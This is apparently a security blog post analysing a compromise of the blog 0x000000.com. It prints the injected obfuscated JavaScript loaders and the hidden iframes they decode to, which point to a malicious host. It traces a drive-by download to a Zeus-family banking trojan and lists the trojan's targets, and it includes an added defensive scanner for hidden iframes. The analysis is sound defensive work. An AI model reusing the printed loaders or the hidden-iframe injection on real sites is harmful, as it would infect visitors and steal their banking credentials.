Today I saw that the front page of 0x000000.com looked empty. Was I going to spend a day without an interesting article to read? No, it wasn't possible!

A quick check of the source code revealed that the main page of this rather famous blog contained some obfuscated JavaScript and a call to a suspicious JavaScript file named webanalytics.js:

<script src="http://safe.google-xxxxxxxxx.com/webanalytics.js"></script>
<script>
function v47f05eb5a54fc(v47f05eb5a5505)
{ var v47f05eb5a5510=16;
return(parseInt(v47f05eb5a5505,v47f05eb5a5510));}
function v47f05eb5a5544(v47f05eb5a554a)
{  var v47f05eb5a5550=''; for(v47f05eb5a5556=0;
v47f05eb5a5556<v47f05eb5a554a.length; v47f05eb5a5556+=2)
{ 
v47f05eb5a5550+=(String.fromCharCode(v47f05eb5a54fc(v47f05eb5a554a.substr(v47f05eb5a5556, 2))));}
return v47f05eb5a5550;}
document.write(v47f05eb5a5544('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3762363731207372633D5C2768747...'));</script>

while webanalytics.js contained:

function google_irl(google_ryg,google_famas) {
var google_xen = "";
for (var i = 0 ; i < google_ryg.length; ++i)
google_xen += String.fromCharCode(google_famas ^ google_ryg.charCodeAt(i));
return google_xen; }
function google_ritn(google_ftak) { eval(google_ftak); return;}
google_ritn(google_irl("\xcb\xd5\xd2\xd8\xd3\xcb\x92\xcf\xc8\xdd\xc8\xc9\xcf\x81
\x9e\xf8\xd3\xd2\xd9\x9e\x87\xb1\xb6\xd8\xd3\xdf\xc9\xd1\xd9\xd2\xc8\x92\xcb\xce
\xd5\xc8\xd9\x94\x9b\x80\xd5\x9b\x97\x9b\xda\xce\xdd\x9b\x97\x9b\xd1\xd9\x9c\xcf
\xce\x9b\x97\x9b\xdf\x81\x9e\x9b\x97\xc9\xd2\xd9\xcf\xdf\xdd\xcc\xd9\x94\x9b\xd4
\xc8\xc8\xcc\x99\x8f\xfd\x93\x93\x8e\x8c\x8d\x92\x8e\x8d\x84\x92\xxx\xxx\xxx\xxx
\xxx\xxx\xxx\x93\xcb\xd9\xde\xdd\xd2\xdd\xd0\xc5\xc8\xd5\xdf\xcf\x93\xdf\xd3\xc9
\xd2\xc8\x92\xcc\xd4\xcc\x99\x8f\xfa\xd3\x99\x8f\xf8\x8d\x9b\x95\x97\x9b\x9e\x9c
\xcb\xd5\xd8...", 188));

Both scripts decoded, as expected, to iframes pointing to a malicious website. According to the whois record of the IP address, the host is said to be in Panama, but the domain is resolved by a Russian name server. As for the owner, he uses a pseudonym, has a Russian e-mail address and is apparently living in Germany. Too much to believe...

The 2 i-frames looked like:

<iframe name=7b671 src='http://url/?100313d5ff' 
width=305 height=340 style='display: none'></iframe>

and

<iframe src="http://201.218.xxx.xxx/webanalytics/count.php?o=1" 
width="0" height="0" style="display:none"></iframe>
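Both frames share the same tell: they are either styled display:none or sized 0x0, so the visitor never sees them. As an added example, not code from the post, here is a small scanner a site owner can run over saved page source to flag iframes hidden that way; the sample HTML is constructed from the two tags above plus one ordinary visible frame (with a made-up example.invalid host) that must not be reported.

```javascript
// Added example, not part of the original post: flag iframes that are hidden
// with display:none / visibility:hidden or sized 0x0, the pattern of the two
// injected frames shown above. A visible, normal-sized iframe is not reported.
const IFRAME_RE = /<iframe\b([^>]*)>/gi;
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;

// Minimal attribute parser: handles double-quoted, single-quoted and
// unquoted values (the injected tags mix all three styles).
function parseAttrs(attrText) {
  const attrs = {};
  let m;
  ATTR_RE.lastIndex = 0;
  while ((m = ATTR_RE.exec(attrText)) !== null) {
    const value = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4];
    attrs[m[1].toLowerCase()] = value;
  }
  return attrs;
}

function findHiddenIframes(html) {
  const hits = [];
  let m;
  IFRAME_RE.lastIndex = 0;
  while ((m = IFRAME_RE.exec(html)) !== null) {
    const a = parseAttrs(m[1]);
    // Normalise "display: none" and "display:none" to one form.
    const style = (a.style || "").replace(/\s+/g, "").toLowerCase();
    const reasons = [];
    if (style.includes("display:none") || style.includes("visibility:hidden")) {
      reasons.push("hidden by style");
    }
    if (a.width === "0" || a.height === "0") {
      reasons.push("zero size");
    }
    if (reasons.length > 0) {
      hits.push({ src: a.src || "", reasons });
    }
  }
  return hits;
}

// Constructed sample: the two iframes quoted above, as they would sit in the
// injected page, plus one ordinary visible frame that must not be flagged.
const SAMPLE_HTML = `
<iframe name=7b671 src='http://url/?100313d5ff'
width=305 height=340 style='display: none'></iframe>
<iframe src="http://201.218.xxx.xxx/webanalytics/count.php?o=1"
width="0" height="0" style="display:none"></iframe>
<iframe src="http://example.invalid/video" width="640" height="360"></iframe>
`;

for (const hit of findHiddenIframes(SAMPLE_HTML)) {
  console.log(hit.src, "->", hit.reasons.join(", "));
}
```

This is deliberately a regex over raw source rather than a DOM walk: the whole point is to look at what the server actually sent, before any script on the page has had a chance to run. Anything it reports with an off-site src is worth comparing against the files in your web root and your last known-good backup.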

Such iframes, so widely spread nowadays, are often a sign of a drive-by download. In that case, after a few exploits, a Windows executable is pushed to the browser and run without any warning. This file (here called getexe.exe) downloads, as its name implies, another executable called upda.exe. That file is the trojan horse, and it needs its configuration file to know its targets. This malware, of the ntos/prg/wsnpoem/zeus family, is a password stealer targeting banks.

The configuration file is encrypted. Once decrypted (on the fly, by the malware itself), it lists all the targets. Alongside some well-known banking institutions, a few more targets seem to have been added:

...
citibank.ru_balance: section 3
http://login.osmp.ru/*
http://www.osmp.ru/dealer/index.php*
https://www.e-gold.com/acct/acct.asp
https://www.e-gold.com/acct/li.asp
https://www.e-gold.com/acct/balance.asp
https://www.moneybookers.com/app/my_account.pl
https://www.epassporte.com/secure/epassporte.cgi
https://light.webmoney.ru/Default.aspx?l=*
http://money.yandex.ru/*
...

Once again, we learn that being a computer security professional doesn't mean you cannot be hacked. No matter how secure you feel, you should always stay up to date on every aspect of your computer security: run as few services as possible, upgrade your software every time an update is released, run internal audits as often as you can to detect potentially bad behaviour on your servers, and have a good IDS/IPS with rules that you understand...

A high number of popular websites have been hacked recently, through different techniques, serving unknown malware to their visitors. This easy way of spreading malware will be used more and more.

Today's attack was no great movie, but rather something quite usual. I hope public awareness and developers' caution will help lower the number of attacks and their impact.

Update: We exchanged some e-mails yesterday with the owner of 0x000000.com, who brought some facts to our attention. First, 0x000000.com is hosted on a shared server. He then pointed out that many other domains hosted on the same server had been hacked, which proves that the attack was not targeted, but rather generic. We thank him for this information, and once again we encourage you to read his writings, which are of great interest.